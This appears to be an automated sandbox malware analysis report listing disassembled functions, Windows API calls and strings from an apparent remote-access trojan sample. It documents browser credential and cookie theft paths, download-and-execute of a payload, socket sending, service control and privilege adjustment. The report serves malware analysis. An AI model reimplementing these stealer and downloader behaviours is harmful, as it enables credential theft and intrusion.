                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                          • String ID:
                                          • API String ID: 3587775597-0
                                          • Opcode ID: 6d200c93f34079ae71c82b73248bc1d4a0017c0a1dadb16676f11039057c5814
                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                          • Opcode Fuzzy Hash: 6d200c93f34079ae71c82b73248bc1d4a0017c0a1dadb16676f11039057c5814
                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID: JD$JD$JD
                                          • API String ID: 745075371-3517165026
                                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 1164774033-405221262
                                          • Opcode ID: 9a74441e6a62c791e3d48e394381276e6adc98fd532e91d105d045f394039e41
                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                          • Opcode Fuzzy Hash: 9a74441e6a62c791e3d48e394381276e6adc98fd532e91d105d045f394039e41
                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C3AD
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C41F
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C42C
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
                                          • GetLastError.KERNEL32(?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C44D
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C463
                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C46A
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C473
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2341273852-0
                                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                          • API String ID: 2127411465-314212984
                                          • Opcode ID: 834e0a0357c9bd35fc75afbee9585628136f3e7a26421bc33e01608f2dfc2d19
                                          • Instruction ID: cc57822c2a7f940fffebe33daf0632284ddc1748a3b8d5e961f42c670a34d5b4
                                          • Opcode Fuzzy Hash: 834e0a0357c9bd35fc75afbee9585628136f3e7a26421bc33e01608f2dfc2d19
                                          • Instruction Fuzzy Hash: D1B1F671A0430066CA14BB76DC579AF36A89F91748F40053FB906671E2EE7D8A48C6DA
                                          APIs
                                          • _free.LIBCMT ref: 00449292
                                          • _free.LIBCMT ref: 004492B6
                                          • _free.LIBCMT ref: 0044943D
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                          • _free.LIBCMT ref: 00449609
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                          • String ID:
                                          • API String ID: 314583886-0
                                          • Opcode ID: 85d2a707ffa6ab69f680b8646be9a2f79c2d84175361cf4d1e6837d974162392
                                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                          • Opcode Fuzzy Hash: 85d2a707ffa6ab69f680b8646be9a2f79c2d84175361cf4d1e6837d974162392
                                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$CreateFirstNext
                                          • String ID: 8eF$HSG$`XG$`XG
                                          • API String ID: 341183262-1600017543
                                          • Opcode ID: 6f81fefc4da4586ac3ce1899c292dfe7ae8a9e1856cb00082ed84c70e3d1e44f
                                          • Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
                                          • Opcode Fuzzy Hash: 6f81fefc4da4586ac3ce1899c292dfe7ae8a9e1856cb00082ed84c70e3d1e44f
                                          • Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                          Strings
                                          • C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, xrefs: 00407042, 0040716A
                                          • 0aF, xrefs: 0040712C
                                          • 0aF, xrefs: 0040701B
                                          • open, xrefs: 00406FF1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadExecuteFileShell
                                          • String ID: 0aF$0aF$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$open
                                          • API String ID: 2825088817-147149048
                                          • Opcode ID: cf2b83abeb2134a1df915f4201471098f2d667ecf5e68f6bac9d0fe0b16a1e4a
                                          • Instruction ID: e12f74d6213dd3660153607da8c9b98f7978e2d251169c1aa1e307be856b925d
                                          • Opcode Fuzzy Hash: cf2b83abeb2134a1df915f4201471098f2d667ecf5e68f6bac9d0fe0b16a1e4a
                                          • Instruction Fuzzy Hash: 1461C471A0830166CA14FB76C8569BE37A59F81758F40093FF9427B2D2EE3C9905C79B
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040884C
                                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                          • String ID: xdF
                                          • API String ID: 1771804793-999140092
                                          • Opcode ID: 38802d10882615ef338cffc9586822bbeeed39d2cd44aa7df9ba9a74de3d35aa
                                          • Instruction ID: 967e03bdddb214c30410211942a515ee3c29859e80101891d5c5db132fd2cd64
                                          • Opcode Fuzzy Hash: 38802d10882615ef338cffc9586822bbeeed39d2cd44aa7df9ba9a74de3d35aa
                                          • Instruction Fuzzy Hash: 94517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB99
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                          • GetLastError.KERNEL32 ref: 0040BA93
                                          Strings
                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                          • UserProfile, xrefs: 0040BA59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                          • API String ID: 2018770650-1062637481
                                          • Opcode ID: dc2b2689bc299d8874a4aac579e14b6bb7d4073350ebb0a6e73faa8ce1665e3c
                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                          • Opcode Fuzzy Hash: dc2b2689bc299d8874a4aac579e14b6bb7d4073350ebb0a6e73faa8ce1665e3c
                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                          • GetLastError.KERNEL32 ref: 004179D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                          • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                          • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                          • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00409293
                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                          • String ID:
                                          • API String ID: 1824512719-0
                                          • Opcode ID: d5fff6ff147be0d9bf0e8b97956a8fab7f12df65085721ed718fed9da3bdc9ac
                                          • Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
                                          • Opcode Fuzzy Hash: d5fff6ff147be0d9bf0e8b97956a8fab7f12df65085721ed718fed9da3bdc9ac
                                          • Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                          • String ID:
                                          • API String ID: 276877138-0
                                          • Opcode ID: 628d36ac3c64f627b3a8437270a5a78b3dcfd045bfbfd251d1d1fe9a009dd844
                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                          • Opcode Fuzzy Hash: 628d36ac3c64f627b3a8437270a5a78b3dcfd045bfbfd251d1d1fe9a009dd844
                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
